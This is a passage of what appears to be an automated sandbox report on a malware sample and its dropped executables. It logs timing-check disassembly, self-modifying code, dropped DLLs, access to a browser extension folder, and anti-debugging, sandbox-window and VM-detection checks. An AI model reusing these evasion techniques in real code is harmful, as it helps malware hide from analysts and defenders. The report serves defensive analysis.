Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80BCD second address: 4C80BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF249520A38h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80BE9 second address: 4C80BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80BED second address: 4C80C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c movsx edx, si 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF249520A34h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80C12 second address: 4C80C33 instructions: 0x00000000 rdtsc 0x00000002 mov ax, A941h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF248D534A3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80C33 second address: 4C80C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF249520A2Fh 0x00000009 or esi, 7C3DCA1Eh 0x0000000f jmp 00007FF249520A39h 0x00000014 popfd 0x00000015 mov di, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test eax, eax 0x0000001d pushad 0x0000001e mov edi, esi 0x00000020 mov dx, cx 0x00000023 popad 0x00000024 jne 00007FF2BB75FAD5h 0x0000002a pushad 0x0000002b mov al, 4Bh 0x0000002d pushad 0x0000002e mov si, bx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80C84 second address: 4C80C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, 00000000h 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80C93 second address: 4C80CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov al, EFh 0x00000007 popad 0x00000008 mov dword ptr [ebp-20h], eax 0x0000000b jmp 00007FF249520A37h 0x00000010 mov ebx, dword ptr [esi] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80CBD second address: 4C80CC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C801FA second address: 4C80212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF249520A34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80212 second address: 4C8027F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D5349Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF248D534A4h 0x00000015 xor al, 00000068h 0x00000018 jmp 00007FF248D5349Bh 0x0000001d popfd 0x0000001e jmp 00007FF248D534A8h 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF248D534A7h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 10F394A second address: 10F3952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F3ED14 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 10DC9C9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 10DB5D6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 116B9FC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: F8ED14 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 112C9C9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 112B5D6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 11BB9FC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Special instruction interceptor: First address: A4F9F3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Special instruction interceptor: First address: C1381B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Special instruction interceptor: First address: BF5B77 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Special instruction interceptor: First address: C814E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Special instruction interceptor: First address: D9D480 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Special instruction interceptor: First address: E28FA8 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Memory allocated: 4E70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Memory allocated: 5030000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Memory allocated: 7030000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04CE027F rdtsc

0_2_04CE027F

Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1225	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1069	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 855	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 819	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 917	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1022	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Window / User API: threadDelayed 560

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015170001\fe1ffe1825.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015169001\f0cbba1288.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	API coverage: 3.7 %
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	API coverage: 3.8 %

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4476	Thread sleep time: -54027s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1900	Thread sleep count: 1225 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1900	Thread sleep time: -2451225s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3244	Thread sleep count: 300 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3244	Thread sleep time: -9000000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1908	Thread sleep count: 1069 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1908	Thread sleep time: -2139069s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2144	Thread sleep count: 855 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2144	Thread sleep time: -1710855s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2380	Thread sleep count: 819 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2380	Thread sleep time: -1638819s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3748	Thread sleep count: 917 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3748	Thread sleep time: -1834917s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1908	Thread sleep count: 1022 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1908	Thread sleep time: -2045022s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2008	Thread sleep count: 421 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2008	Thread sleep time: -842421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe TID: 2488	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe TID: 2412	Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe TID: 1608	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe TID: 2208	Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe TID: 6904	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe TID: 1228	Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe TID: 2520	Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe TID: 3864	Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe TID: 6504	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe TID: 6508	Thread sleep count: 134 > 30
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe TID: 6508	Thread sleep count: 143 > 30
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe TID: 7336	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe TID: 7304	Thread sleep count: 215 > 30
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe TID: 7304	Thread sleep time: -1290000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_0002BE9A FindFirstFileExW,	6_2_0002BE9A
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_0002BF4B FindFirstFileExW,FindNextFileW,FindClose,FindClose,	6_2_0002BF4B
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_0103DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	9_2_0103DBBE
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_0104698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	9_2_0104698F
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_010468EE FindFirstFileW,FindClose,	9_2_010468EE
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_0103D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	9_2_0103D076
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_0103D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	9_2_0103D3A9
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_0104979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	9_2_0104979D
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01049642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	9_2_01049642
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01049B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	9_2_01049B2B
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01045C97 FindFirstFileW,FindNextFileW,FindClose,	9_2_01045C97

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_00FD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

9_2_00FD42DE

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: file.exe, file.exe, 00000000.00000002.1745504305.00000000010BD000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmp, acdee533dd.exe, 0000001A.00000002.3066752862.0000000000BCE000.00000040.00000001.01000000.00000012.sdmp, e2def46cb9.exe, 0000001F.00000002.2805051642.0000000000D78000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: firefox.exe, 00000019.00000002.2610746346.000001C2B2218000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: acdee533dd.exe, 0000001A.00000002.3074070661.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW6
Source: PK13K1G.exe, 00000008.00000002.2562292696.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2555567301.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2500389249.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW-
Source: firefox.exe, 00000017.00000002.2615846850.000001323E9B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_AR
Source: acdee533dd.exe, 0000001A.00000002.3074070661.0000000001384000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhk;
Source: PK13K1G.exe, 00000008.00000002.2560501874.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2552449673.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2562292696.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2555567301.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2500389249.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, 8ed1a1ded0.exe, 00000009.00000003.2547806091.0000000001884000.00000004.00000020.00020000.00000000.sdmp, 8ed1a1ded0.exe, 00000009.00000003.2551725956.00000000018A3000.00000004.00000020.00020000.00000000.sdmp, 8ed1a1ded0.exe, 00000009.00000002.2561662127.00000000018A3000.00000004.00000020.00020000.00000000.sdmp, 8ed1a1ded0.exe, 00000009.00000003.2548725846.000000000189C000.00000004.00000020.00020000.00000000.sdmp, 8ed1a1ded0.exe, 00000009.00000003.2547968664.0000000001890000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: acdee533dd.exe, 0000001A.00000002.3074070661.000000000133E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: firefox.exe, 00000017.00000002.2620813706.0000013248ABE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2609765384.000001C2B2120000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: firefox.exe, 0000001B.00000002.2609170334.000002713BB70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>O/b
Source: acdee533dd.exe, 0000001A.00000002.3074070661.000000000133E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware@}
Source: file.exe, 00000000.00000002.1745504305.00000000010BD000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmp, acdee533dd.exe, 0000001A.00000002.3066752862.0000000000BCE000.00000040.00000001.01000000.00000012.sdmp, e2def46cb9.exe, 0000001F.00000002.2805051642.0000000000D78000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: firefox.exe, 0000001B.00000002.2607215401.000002713B3EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: firefox.exe, 00000019.00000002.2610746346.000001C2B2218000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609170334.000002713BB70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node			graph_1-9987
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node			graph_1-9966

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe

System information queried: KernelDebuggerInformation

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

